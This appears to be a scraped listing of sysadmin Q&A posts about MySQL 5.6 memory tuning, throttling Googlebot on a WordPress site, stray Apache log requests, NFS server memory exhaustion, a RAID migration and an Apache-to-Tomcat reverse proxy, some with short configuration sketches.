    I updated my dev-box's WAMPSERVER, and along with updating PHP and Apache, MySQL updated to '5.6.12'. After doing that, I copied the data folder from my old (5.1.36) install to the new one and now MySQL takes up 580 MB, which is way too much, since I'm the only person using it (locally) and there are only 20 or so databases on it, none of which have 'memory' tables. How can I get this down to a decent amount? My my.ini: # For advice on how to change settings please see # http://dev.mysql.com/doc/refman/5.6/en/server-configuration-defaults.html # *** DO NOT EDIT THIS FILE. It's a template which will be copied to the # *** default location during install, and will be replaced if you # *** upgrade to a newer version of MySQL. [mysqld] # Remove leading # and set to the amount of RAM for the most important data # cache in MySQL. Start at 70% of total RAM for dedicated server, else 10%. # innodb_buffer_pool_size = 128M # Remove leading # to turn on a very important data integrity option: logging # changes to the binary log between backups. # log_bin # These are commonly set, remove the # and set as required. # basedir = ..... # datadir = ..... # port = ..... # server_id = ..... # Remove leading # to set options mainly useful for reporting servers. # The server defaults are faster for transactions and fast SELECTs. # Adjust sizes as needed, experiment to find the optimal values. # join_buffer_size = 128M # sort_buffer_size = 2M # read_rnd_buffer_size = 2M sql_mode=NO_ENGINE_SUBSTITUTION,STRICT_TRANS_TABLES Database info: Storage Engine Data Size Index Size Total Size InnoDB 48.00 KB 0.00 B 48.00 KB MEMORY 0.00 B 0.00 B 0.00 B MyISAM 163.64 MB 122.49 MB 286.13 MB Total 163.69 MB 122.49 MB 286.18 MB
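
    A hedged explanation and a sketch: MySQL 5.6 turns the Performance Schema on by default, which by itself can account for roughly 400 MB of that footprint, and the 5.6 defaults for the table caches are also much larger than 5.1's. The values below are illustrative for a single-developer box, not tuned recommendations.

        [mysqld]
        performance_schema      = OFF
        table_definition_cache  = 400
        table_open_cache        = 400
        innodb_buffer_pool_size = 64M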

    Read the article

  • Google bots are severely affecting site performance

    - by Lynn
    I have an aggregate site on a Linux server that pulls in feeds from a universe of about 2,000 blogs. It's in WordPress 3.4.2 and I have a cron job that is staggered to run five times an hour on another server to pull in the stories and then publish them to the front page of this site. This is so I don't put too much pressure all on one server. However, the Google bots, which visit a few times every hour, bring the server to its knees in the mornings and evenings when there is an increase in traffic on the site. The bots have something like 30,000 links to follow at this point. How do I throttle the bots to simply grab the new stories off the front page and stop there? EDIT: Details of my server configuration: The way we have this set up is that the server that handles all the publishing is an unmanaged instance via AWS. It mounts the NFS server and connects to the RDS to update content, etc. You get to this publishing instance via a plugin that detects the wp-admin link and then redirects you there. The front end app server also mounts the NFS and requests data from the RDS. It is the only one that has WP Super Cache on it.... The OS is Ubuntu on the app server and the NFS runs CentOS. The front end is Nginx and the publishing server is Apache.
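
    A sketch of the crawl-side levers, with the caveat that Googlebot ignores Crawl-delay (its crawl rate is set in Google Webmaster Tools instead) and that the paths below are only examples of the low-value WordPress URLs that tend to multiply crawlable links:

        # robots.txt (example paths -- adjust to whatever actually generates the 30,000 links)
        User-agent: *
        Disallow: /wp-admin/
        Disallow: /feed/
        Disallow: /*?replytocom=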

    Read the article

  • What are these isolated resource requests in Apache's access_log?

    - by Greg
    I was looking at my Apache access log and came across some strange requests. A single IP address will access several resources (mostly CSS style sheets and images), but no actual pages. Sometimes they are requesting a resource that no longer exists on the server, or one that is still under the web root but no longer used (e.g. a resource in an old WordPress theme). Also: the requests list no referrer; I get no useful information on the IP address by looking it up; and there doesn't seem to be any pattern among the IP addresses that are making these requests (e.g. different countries). Are these just links from a stale cache somewhere? Could it be a sign of an attack of some sort? Here is a typical example: GET /wp-content/themes/my-theme/images/old-image.gif HTTP/1.1" 500 809 "-" "Mozilla/4.0 (compatible;)" This was one of about 10 similar requests, some for existing resources, some for older resources. There is no other sign of this IP address in access_log. Note the internal server error, which is a topic for a different thread. What I'm asking here is where would isolated requests like this come from?

    Read the article

  • How Do I Stop NFS Clients from Using All of the NFS Server's Resources?

    - by Ken S.
    I have a v4 NFS server running on Ubuntu 12.04 LTS. It is the main repository for the web assets that four external nginx webservers mount to serve up to site visitors. These client servers connect to it via a read-only mount. Each of these RO servers has this displayed when I check the mounts: 10.0.0.90:/assets on /var/www/assets type nfs4 (ro,addr=10.0.0.90,clientaddr=0.0.0.0) The NFS master's /etc/exports file contains entries like this for each server: /mnt/lvm-ext4 10.0.0.40(ro,fsid=0,insecure,no_subtree_check,async) The problem that I'm seeing is that these clients are eventually utilizing all the RAM on the NFS server and causing it to crash. If I do a watch free -m I can watch the used memory creep up until it's all used, and then see the free buffers/cache entry creep down to near zero before the server eventually locks up, requiring a reboot. There is some sort of memory leak somewhere that is causing this, and the optimal solution would be to find it and fix it, but in the meantime I need to find a way to have the NFS server protect itself from connected clients using all its RAM. There must be some sort of setting that limits the resources the clients can use, but I can't seem to find it. I've tried adjusting the values for rsize and wsize but they don't seem to help or be related. Thanks for any tips.
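
    Two mitigations that can be sketched while the leak is hunted down; the file path is the Ubuntu default for the NFS kernel server, and the sysctl value is illustrative rather than a recommendation:

        # /etc/default/nfs-kernel-server -- fewer nfsd threads bounds how much concurrent work the server takes on
        RPCNFSDCOUNT=8

        # make the kernel reclaim dentry/inode caches more aggressively (runtime change)
        sysctl -w vm.vfs_cache_pressure=200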

    Read the article

  • Move OS from RAID5 array to RAID 1 arrays

    - by Antoine
    I want to give a last boost to my old ProLiant ML350 G5 server, which just needs to be reliable for a few more years only! With a defined budget of about $1500 (I do not have more), I plan to replace the CPU (and add a second one), replace the cache battery of my RAID controller (E200i), double the RAM, and change all hard drives. I have 7 HDDs (SAS 10krpm, 72Gb) + 1 spare in RAID5, and my system is all FULL (no empty tray, full disks). In my current RAID5 array, I have 2 partitions: - 1 OS partition, 20Gb - 1 data partition, 350 Gb I plan to replace these 8 disks with: - 2 x 300Gb SAS 15krpm in RAID 1 (= 1 partition for OS) - 2 x 2Tb SATA 7.2krpm in RAID 1 (= 1 partition for DATA) My biggest constraint is that I have only one day to upgrade my server. Therefore, I'm looking to clone all my files (OS + data partition) to my new arrays, i.e.: - the OS partition shall be cloned to the RAID1 "2x300Gb array" - the data partition shall be cloned to the RAID1 "2x2Tb array" My second problem is that I need to physically remove all the old hard drives before inserting the new ones. I'm running Windows Server 2003 R2, and even if MS support will expire soon, I cannot buy a new licence and spend time on configuration. Obviously, with $1500, I cannot also buy a new server that I could start configuring from now! I thought about ASR (NTBackup), but I have no floppy drive (and do not really want to invest in one!). I thought about a Clonezilla clone, and read this interesting link: Windows Server 2003 - move C: partition to a new SAS disk, but I'm not so confident in using Clonezilla with RAID5. What would be the best option to quickly and easily (if possible!) "copy/paste" my OS (so no need to reinstall and reconfigure all) and DATA / programs / services, etc.?

    Read the article

  • Apache reverse proxy with VirtualHost not serving a page

    - by Mr Aleph
    I have an Apache reverse proxy set up to pass requests to a Tomcat applet. The config is similar to: <VirtualHost 100.100.100.100:80> ProxyPass /AppName/App http://1.1.1.1/AppName/App ProxyPassReverse /AppName/App http://1.1.1.1/AppName/App </VirtualHost> I also have a page called summary.html that exists on 1.1.1.1 as: http://1.1.1.1/AppName/summary.html When I browse directly to it I have no problem viewing it; however, if I try to get there via the reverse proxy I get a blank page. Wireshark shows me a 503, but this one is coming from the Apache reverse proxy (IP 100.100.100.100) and not the Tomcat (IP 1.1.1.1). Should I add http://1.1.1.1/AppName/ to the config? How? I tried it, but I get a blank page; however, this one shows the internal IP of the Tomcat in the browser's URL bar, so, no go. Help is appreciated. Thanks. EDIT: This is the dump from Wireshark: GET /AppName/ HTTP/1.1 Host: 100.100.100.100 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/534.52.7 (KHTML, like Gecko) Version/5.1.2 Safari/534.52.7 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Cache-Control: max-age=0 Accept-Language: en-us Accept-Encoding: gzip, deflate Connection: keep-alive HTTP/1.1 404 Not Found Date: Tue, 30 Jan 2012 09:08:51 GMT Server: Apache Content-Length: 1 Connection: close Content-Type: text/html; charset=iso-8859-1
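
    A sketch of the direction hinted at in the question, proxying the whole application path rather than only the servlet so that static pages such as summary.html are reachable without exposing the backend address (the trailing slashes keep the URL mapping consistent and avoid leaking the internal IP in redirects):

        <VirtualHost 100.100.100.100:80>
            ProxyPass        /AppName/ http://1.1.1.1/AppName/
            ProxyPassReverse /AppName/ http://1.1.1.1/AppName/
        </VirtualHost>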

    Read the article
